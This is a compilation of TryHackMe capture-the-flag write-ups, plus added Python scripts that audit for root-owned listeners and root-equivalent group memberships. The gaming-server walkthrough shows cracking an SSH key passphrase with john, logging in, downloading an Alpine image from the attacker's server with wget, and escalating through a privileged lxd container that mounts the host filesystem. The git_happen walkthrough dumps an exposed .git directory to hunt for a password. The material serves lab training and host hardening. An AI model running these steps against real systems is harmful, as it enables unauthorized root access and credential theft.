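The `ss -tulpn` plus `ps aux` check above (and the bolt lesson that a service running as root hands root to whoever compromises it) can be turned into a host audit. The script below is an added example, not code from these write-ups: it joins listening sockets with their owning processes and reports every non-loopback listener that runs as root and is not on an expected list, plus listeners whose owner cannot be resolved, which is what `ss` shows to an unprivileged user (on the box above the users: column was empty, which is why `ps aux` was needed). Both inputs are constructed for the demo, modelled on the gamezone output; the PIDs and the `EXPECTED_ROOT` allow-list are assumptions.

```python
"""Audit listening sockets for network services running as root.

Added example (not code from these write-ups). SS_OUTPUT and PS_OUTPUT are
constructed for the demo, modelled on the gamezone output above.
"""
import re
from collections import namedtuple

# Constructed `ss -tulpn` output as seen by root (the users: column needs root).
SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      *:10000           *:*     users:(("miniserv.pl",pid=1235,fd=6))
tcp   LISTEN 0      80     127.0.0.1:3306    *:*     users:(("mysqld",pid=1102,fd=17))
tcp   LISTEN 0      128    *:10000           *:*     users:(("miniserv.pl",pid=1235,fd=5))
tcp   LISTEN 0      128    *:22              *:*     users:(("sshd",pid=1050,fd=3))
tcp   LISTEN 0      128    :::80             :::*    users:(("apache2",pid=1300,fd=4))
tcp   LISTEN 0      128    :::8000           :::*
"""

# Constructed `ps aux` output; only USER, PID and COMMAND are used.
PS_OUTPUT = """\
USER       PID %CPU %MEM    VSZ   RSS TTY STAT START TIME COMMAND
root      1050  0.0  0.5  65508  5400 ?   Ss   05:11 0:00 /usr/sbin/sshd -D
mysql     1102  0.1  5.0 1100000 88000 ?  Ssl  05:11 0:01 /usr/sbin/mysqld
root      1235  0.0  1.2  75020 25928 ?   Ss   05:11 0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
www-data  1300  0.0  1.0  70000 20000 ?   S    05:11 0:00 /usr/sbin/apache2 -k start
"""

EXPECTED_ROOT = {"sshd"}                  # assumed allow-list: services that may listen as root
LOOPBACK = {"127.0.0.1", "::1", "[::1]"}  # only reachable from the host itself

Listener = namedtuple("Listener", "proto addr port pid name")
Finding = namedtuple("Finding", "kind proto addr port name user")
PID_RE = re.compile(r'"([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Listening sockets from `ss -tulpn` (tcp LISTEN and udp UNCONN rows)."""
    listeners = []
    for line in text.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 5 or cols[1] not in ("LISTEN", "UNCONN"):
            continue
        addr, _, port = cols[4].rpartition(":")   # last colon splits ":::80" into "::" and "80"
        m = PID_RE.search(line)
        name, pid = (m[1], int(m[2])) if m else (None, None)
        listeners.append(Listener(cols[0], addr, int(port), pid, name))
    return listeners


def parse_ps(text):
    """pid -> (user, command) from `ps aux` output."""
    owners = {}
    for line in text.splitlines()[1:]:
        cols = line.split(None, 10)            # COMMAND may contain spaces
        if len(cols) == 11:
            owners[int(cols[1])] = (cols[0], cols[10])
    return owners


def audit(ss_text, ps_text):
    """Findings for root-owned or unattributable listeners bound to non-loopback addresses."""
    owners = parse_ps(ps_text)
    findings = []
    for lst in parse_ss(ss_text):
        if lst.addr in LOOPBACK:
            continue
        if lst.pid is None:                    # no users: column -> re-run ss as root
            findings.append(Finding("unknown-owner", lst.proto, lst.addr, lst.port, None, None))
            continue
        user, _cmd = owners.get(lst.pid, ("?", ""))
        if user == "root" and lst.name not in EXPECTED_ROOT:
            findings.append(Finding("root-exposed", lst.proto, lst.addr, lst.port, lst.name, user))
    return findings


if __name__ == "__main__":
    for f in audit(SS_OUTPUT, PS_OUTPUT):
        print(f)
```

On a real host run it as root so every socket carries its `users:` entry; the `unknown-owner` rows tell you when it was not.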

GLHF
-------------------------------------------------------------------------------- /TryHackMe/Easy/gaming-server.md: --------------------------------------------------------------------------------
# recon
- nmap
```
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
```
- gobuster
```
/about.php (Status: 200)
/about.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)
```

- port 80 httpserver
  - index.html: ``
  - where is `/arhives.html`
  - /uploads/dict.lst: a password list
  - /secret: contains an RSA key encrypted with AES


# foot hold
So as you can see, we got a password list + an ssh key (RSA) encrypted with AES. I guess one of the passwords in the list (`/uploads/dict.lst`) can be used to decrypt the ssh key. We can then use the ssh key to gain a foothold on the victim server.

Let's start by converting the encrypted ssh key to a format that john can understand, then use john to crack the passphrase. We will use `dict.lst` as our password list.
```console
kali@kali:~/THM/gamingserver$ sudo python /usr/share/john/ssh2john.py secretKey > ssh2john.txt
kali@kali:~/THM/gamingserver$ sudo john --wordlist=dict.lst ssh2john.txt
.
.
Press 'q' or Ctrl-C to abort, almost any other key for status
 (secretKey)
1g 0:00:00:00 DONE (2020-09-02 14:47) 100.0g/s 22200p/s 22200c/s 22200C/s 2003..starwars
```
Now let's use `openssl` to decrypt `secretKey`:
```console
kali@kali:~/THM/gamingserver$ openssl rsa -in secretKey -out gamingserver_key
Enter pass phrase for secretKey:
writing RSA key
```
What are we waiting for? Let's ssh to the victim server and grab the user flag:
```console
kali@kali:~/THM/gamingserver$ ssh john@$IP -i gamingserver_key
Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ ls
user.txt
```
# root
```console
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
```
lxd!! I have seen it so many times. If you don't know what LXD is, please do some research by yourself. Also check this for a step-by-step lxd exploit: [link](https://www.hackingarticles.in/lxd-privilege-escalation/)


So what are we waiting for? Let's get root!!
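Membership of `lxd` (and `sudo`) in john's `id` output above is the whole privilege-escalation path, so it is worth auditing for on your own hosts. The script below is an added example, not code from these write-ups: it parses either a line of `id` output or an `/etc/group` file and lists every member of a group that is effectively root-equivalent, with the reason it matters. The `id` line is the one shown in this room; the `/etc/group` contents, the extra account names and the group-to-reason table are constructed for the demo.

```python
"""Flag accounts whose group membership is equivalent to root.

Added example (not code from these write-ups). SAMPLE_ID is the `id` line
from this room; SAMPLE_GROUP_FILE and the reason table are constructed.
"""
import re

# Groups whose members can become root, and why (docker/lxd/disk are often overlooked).
ROOT_EQUIVALENT = {
    "sudo":   "can run commands as root via sudo (check sudoers for limits)",
    "wheel":  "can run commands as root via sudo/su on many distros",
    "admin":  "legacy Ubuntu admin group with sudo rights",
    "docker": "can start a container with the host filesystem mounted",
    "lxd":    "can launch a privileged LXD container with / mounted",
    "lxc":    "older LXD packages used this group name for the same access",
    "disk":   "raw read/write access to block devices, bypassing file permissions",
    "shadow": "can read /etc/shadow password hashes",
}

ID_GROUP_RE = re.compile(r"\d+\(([^)]+)\)")

SAMPLE_ID = ("uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),"
             "27(sudo),30(dip),46(plugdev),108(lxd)")

SAMPLE_GROUP_FILE = """\
root:x:0:
adm:x:4:syslog,john
sudo:x:27:john
lxd:x:108:john,deploy
docker:x:999:ci
users:x:100:
"""


def parse_id(output):
    """Return the group names from one line of `id` output, in order."""
    _, _, groups = output.partition("groups=")
    return ID_GROUP_RE.findall(groups)


def parse_group_file(text):
    """Map group name -> list of supplementary members from /etc/group."""
    members = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _passwd, _gid, users = line.split(":", 3)
        members[name] = [u for u in users.split(",") if u]   # "root:x:0:" -> []
    return members


def assess_groups(groups):
    """Return {group: reason} for the root-equivalent groups in `groups`."""
    return {g: ROOT_EQUIVALENT[g] for g in groups if g in ROOT_EQUIVALENT}


def audit_group_file(text):
    """Sorted (user, group, reason) rows for every root-equivalent membership."""
    rows = []
    for group, users in parse_group_file(text).items():
        if group in ROOT_EQUIVALENT:
            rows.extend((u, group, ROOT_EQUIVALENT[group]) for u in users)
    return sorted(rows)


if __name__ == "__main__":
    print("from id:", assess_groups(parse_id(SAMPLE_ID)))
    for user, group, reason in audit_group_file(SAMPLE_GROUP_FILE):
        print(f"{user:10} {group:8} {reason}")
```

Primary group membership (the `gid=` field, or the third column of `/etc/passwd`) is not covered by `/etc/group`'s member list, so pair `audit_group_file` with a pass over `/etc/passwd` if a user's primary group could be one of these.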

```console
john@exploitable:~$ wget http://:8080/myalpine.tar.gz
2020-09-02 19:04:23 (1.01 MB/s) - 'myalpine.tar.gz' saved [3199169/3199169]
john@exploitable:~$ ls
myalpine.tar.gz user.txt
john@exploitable:~$ lxc image import myalpine.tar.gz --alias kurohat
Image imported with fingerprint: 19d278b8c78857a750fb2589c3addb3fa4a4b11fbb2c2b28275400e3a60fbb79
john@exploitable:~$ lxc init kurohat ignite -c security.privileged=true
Creating ignite
john@exploitable:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
john@exploitable:~$ lxc start ignite
john@exploitable:/mnt$ lxc exec ignite /bin/sh # bash will also work but this server does not have /bin/bash
~ # id
uid=0(root) gid=0(root)
```
Now let's move to the mount point `/mnt/root/` and grab the root flag.
-------------------------------------------------------------------------------- /TryHackMe/Easy/git_happen.md: --------------------------------------------------------------------------------
# recon
# nmap
```
80/tcp open http
Enumerating open ports...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 16:58 EDT
Nmap scan report for 10.10.74.55
Host is up (0.045s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
| http-git:
|   10.10.74.55:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
```
As you can see, nmap found `.git/`.
# gobuster
- `/dashboard.html` (Status: 200)

  I looked at the page using Burp Suite. Normally the web page redirects you to `/index.html`. With Burp Suite you can catch the redirect and not forward it, so you can analyse the page. But that is not the point: the goal of this room is to get the admin password.
- `/index.html` (Status: 200)


# git-dumper
Dump `.git` so we can analyse it on kali:
```console
$ ./git-dumper http://$IP/ /dump/it
```
Now move to the directory and run `git log` to read the logs. To see more output in the git pager press `D`.
```
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand
Date:   Thu Jul 23 22:22:16 2020 +0000

    Update .gitlab-ci.yml

commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum
Date:   Fri Jul 24 00:21:25 2020 +0200

    add gitlab-ci config to build docker file.

commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
Author: Hydragyrum
Date:   Fri Jul 24 00:08:38 2020 +0200

    setup dockerfile and setup defaults.

commit d6df4000639981d032f628af2b4d03b8eff31213
Author: Hydragyrum
Date:   Thu Jul 23 23:42:30 2020 +0200

    Make sure the css is standard-ish!

commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum
Date:   Thu Jul 23 23:41:12 2020 +0200

    re-obfuscating the code to be really secure!

commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum
Date:   Thu Jul 23 23:37:32 2020 +0200

    Security says obfuscation isn't enough.

    They want me to use something called 'SHA-512'

commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum
Date:   Thu Jul 23 23:25:52 2020 +0200

    Obfuscated the source code.

    Hopefully security will be happy!

commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand
Date:   Mon Jul 20 20:46:28 2020 +0000

    Initial commit
```
By examining the logs you will find an interesting commit with the message `Made the login page, boss!`. To check the changes in that commit run `git show `

```console
git show 395e087334d613d5e423cdf8f7be27196a360459
```
Now let's look for the password
```